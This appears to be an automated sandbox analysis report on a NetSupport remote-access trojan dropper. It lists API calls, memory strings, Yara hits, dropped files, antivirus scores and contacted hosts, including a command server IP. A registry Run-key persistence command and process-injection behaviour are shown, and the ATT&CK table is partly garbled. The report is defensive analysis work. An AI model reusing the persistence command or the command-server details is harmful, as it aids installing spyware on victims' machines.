Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,5_2_1106A0A0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,5_2_111266E0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,5_2_1110AFD0
                                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041C8D5 VirtualQuery,GetSystemInfo,0_2_0041C8D5
Source: HTCTL32.DLL.0.dr | Binary or memory string: VMware
Source: file.exe, 00000000.00000002.1734404708.00000000011B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla|l*
Source: HTCTL32.DLL.0.dr | Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr | Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: file.exe, 00000000.00000002.1734404708.00000000011B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: bild.exe, 00000004.00000002.3582168391.0000000005C31000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3581039024.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: HTCTL32.DLL.0.dr | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.0.dr | Binary or memory string: VMWare
Source: bild.exe, 00000004.00000002.3581039024.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: bild.exe, 00000005.00000003.1834085159.000000000086F000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000005.00000002.1834399853.0000000000872000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000009.00000003.1914790001.0000000000F50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node graph_0-23444
Source: C:\Users\Public\Public\Videos\Video\bild.exe | API call chain: ExitProcess graph end node graph_4-58960
Source: C:\Users\Public\Public\Videos\Video\bild.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041DA75
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,4_2_11147750
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,4_2_11029590
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00424A5A mov eax, dword ptr fs:[00000030h] 0_2_00424A5A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00428AAA GetProcessHeap,0_2_00428AAA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041DA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041DA75
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00425B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00425B53
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041DBC3 SetUnhandledExceptionFilter,0_2_0041DBC3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041DD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041DD7C
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,4_2_11093080
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,4_2_110310C0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_11161D01
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_1116DD89
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,5_2_11093080
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,5_2_110310C0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_11161D01
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1116DD89
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,4_2_110F4560
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,4_2_1111FCA0
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Public\Videos\Video\netsup.bat" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Public\Videos\Video\bild.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\Public\Videos\Video\bild.exe C:\Users\Public\Public\Videos\Video\bild.exe
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,4_2_1109E190
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,4_2_1109E910
Source: file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | Binary or memory string: Shell_TrayWnd
Source: bild.exe, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | Binary or memory string: Progman
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041D8CB cpuid 0_2_0041D8CB
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_0041932F
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11173A35
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11173D69
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11173CC6
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: GetLocaleInfoA,4_2_1116B38E
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_11173933
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_111739DA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_1117383E
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11173D2D
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11173C06
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_11173D69
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: GetLocaleInfoA,5_2_1116B38E
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_11173933
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_111739DA
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_1117383E
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_11173A35
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173D2D
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_11173C06
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173CC6
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,4_2_110F33F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041C131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,0_2_0041C131
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,4_2_1103B160
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,5_2_11174AE9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A8E0 GetVersionExW,0_2_0040A8E0
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,4_2_11070090
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 4_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,4_2_110D8200
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,5_2_11070090
Source: C:\Users\Public\Public\Videos\Video\bild.exe | Code function: 5_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,5_2_110D8200
Source: Yara match | File source: 5.2.bild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.bild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.0.bild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.bild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.6d100000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.6d100000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.6d0f0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.6d0f0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.6d100000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.6d0f0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.6c780000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.3754800.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.bild.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1915079530.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.1914004958.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1834399853.0000000000858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.1735527672.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1832877239.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1914967107.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1834377646.0000000000822000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7444, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7688, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 7892, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: bild.exe PID: 8168, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\bild.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Public\Videos\Video\PCICL32.DLL, type: DROPPED
MITRE ATT&CK matrix columns: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information1
                                Scripting
                                2
                                Valid Accounts
                                1
                                Windows Management Instrumentation
                                1
                                Scripting
                                1
                                DLL Side-Loading
                                1
                                Deobfuscate/Decode Files or Information
                                1
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                1
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                1
                                DLL Side-Loading
                                2
                                Valid Accounts
                                3
                                Obfuscated Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                22
                                Encrypted Channel
                                Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts2
                                Command and Scripting Interpreter
                                2
                                Valid Accounts
                                21
                                Access Token Manipulation
                                2
                                Software Packing
                                Security Account Manager3
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Input Capture
                                3
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution
                                1
                                Windows Service
                                1
                                Windows Service
                                1
                                DLL Side-Loading
                                NTDS44
                                System Information Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                4
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder
                                13
                                Process Injection
                                1
                                Masquerading
                                LSA Secrets141
                                Security Software Discovery
[MITRE ATT&CK matrix: table residue; the full matrix does not survive extraction. Techniques flagged for this sample, as far as they are recoverable from the remaining cells: Registry Run Keys / Startup Folder; Valid Accounts; Virtualization/Sandbox Evasion; Modify Registry; Process Discovery; Application Window Discovery; Access Token Manipulation; System Owner/User Discovery; Process Injection.]
Behavior Graph
Behavior Graph ID: 1556890
Sample: file.exe
Start date: 16/11/2024
Architecture: WINDOWS
Score: 88
Contacted domain: geo.netsupportsoftware.com

Top-level signatures:
• Suricata IDS alerts for network traffic
• Multi AV Scanner detection for dropped file
• Multi AV Scanner detection for submitted file
• 4 other signatures

Process tree (numbers in parentheses are the count badges shown next to each process in the graph):
• file.exe (19), started
    dropped: C:\Users\Public\Public\...\remcmdstub.exe (PE32); C:\Users\Public\Public\Videos\...\pcicapi.dll (PE32); C:\Users\Public\Public\Videos\...\bild.exe (PE32); 6 other files (3 malicious)
    • cmd.exe (1), started
        • bild.exe (16), started
            network: 45.61.128.74 (ports 443, 49730), M247GB, United States; geo.netsupportsoftware.com -> 104.26.0.231 (ports 49731, 80), CLOUDFLARENETUS, United States
            signatures: Multi AV Scanner detection for dropped file; Contains functionality to change the wallpaper; Delayed program exit found
        • conhost.exe, started
        • reg.exe (1, 1), started
• bild.exe, started
• bild.exe, started

Antivirus detection

Initial sample:
Source | Detection | Scanner | Label | Link
file.exe | 50% | ReversingLabs | Win32.Trojan.NetSupport |
file.exe | 51% | Virustotal | | Browse

Dropped files:
Source | Detection | Scanner | Label | Link
C:\Users\Public\Public\Videos\Video\HTCTL32.DLL | 3% | ReversingLabs | |
C:\Users\Public\Public\Videos\Video\HTCTL32.DLL | 3% | Virustotal | | Browse
C:\Users\Public\Public\Videos\Video\PCICHEK.DLL | 3% | ReversingLabs | |
C:\Users\Public\Public\Videos\Video\PCICHEK.DLL | 1% | Virustotal | | Browse
C:\Users\Public\Public\Videos\Video\PCICL32.DLL | 12% | ReversingLabs | |
C:\Users\Public\Public\Videos\Video\PCICL32.DLL | 17% | Virustotal | | Browse
C:\Users\Public\Public\Videos\Video\TCCTL32.DLL | 3% | ReversingLabs | |
C:\Users\Public\Public\Videos\Video\TCCTL32.DLL | 3% | Virustotal | | Browse
C:\Users\Public\Public\Videos\Video\bild.exe | 29% | ReversingLabs | Win32.Trojan.NetSupport |
C:\Users\Public\Public\Videos\Video\bild.exe | 49% | Virustotal | | Browse
C:\Users\Public\Public\Videos\Video\msvcr100.dll | 0% | ReversingLabs | |
C:\Users\Public\Public\Videos\Video\pcicapi.dll | 3% | ReversingLabs | |
C:\Users\Public\Public\Videos\Video\remcmdstub.exe | 13% | ReversingLabs | |

Unpacked PE files: No Antivirus matches

Domains: No Antivirus matches

URLs:
Source | Detection | Scanner | Label | Link
http://45.61.128.74/fakeurl.htm | 0% | Virustotal | | Browse
http://45.61.128.74/fakeurl.htm | 0% | Avira URL Cloud | safe |
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 104.26.0.231 | true | false | | high

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://45.61.128.74/fakeurl.htm | true | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://geo.netsupportsoftware.com/location/loca.asp | false | | high
URLs from memory and binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://geo.netsupportsoftware.com/location/loca.aspb | bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.pci.co.uk/support | file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://%s/testpage.htmwininet.dll | bild.exe, 00000004.00000002.3582830563.000000006C7C0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s) | file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.pci.co.uk/supportsupport | file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835054490.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915932796.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://www.symauth.com/rpa00 | file.exe, 00000000.00000003.1727368341.000000000392B000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, bild.exe.0.dr, PCICL32.DLL.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr | false | | high
http://geo.netsupportsoftware.com/location/loca.aspx | bild.exe, 00000004.00000002.3581039024.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://127.0.0.1RESUMEPRINTING | file.exe, 00000000.00000003.1727368341.00000000035A5000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000005.00000002.1835014337.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.1915886362.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
